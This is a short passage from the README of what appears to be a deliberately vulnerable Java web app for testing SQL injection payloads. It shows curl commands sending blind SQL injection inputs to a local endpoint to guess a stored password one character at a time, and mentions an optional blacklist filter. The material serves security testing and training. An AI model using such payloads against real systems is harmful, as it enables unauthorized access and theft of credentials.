secf00tprint/payloadtester_sqli/sqli_victim_webapp_java/README.md

 curl localhost:5808/sqlidemo/vulnbyid2 -d id="1' AND SUBSTRING(password,1,1)='p"
 curl localhost:5808/sqlidemo/vulnbyid2 -d id="1' AND SUBSTRING(password,1,1)='a"
 ```

+Check id and used password against database.
+If one of both doesn't exist you will get a 500.

 #### Blacklist

 For the JDBC based vulnerable rest endpoint a blacklist filter is implemented which can be applied.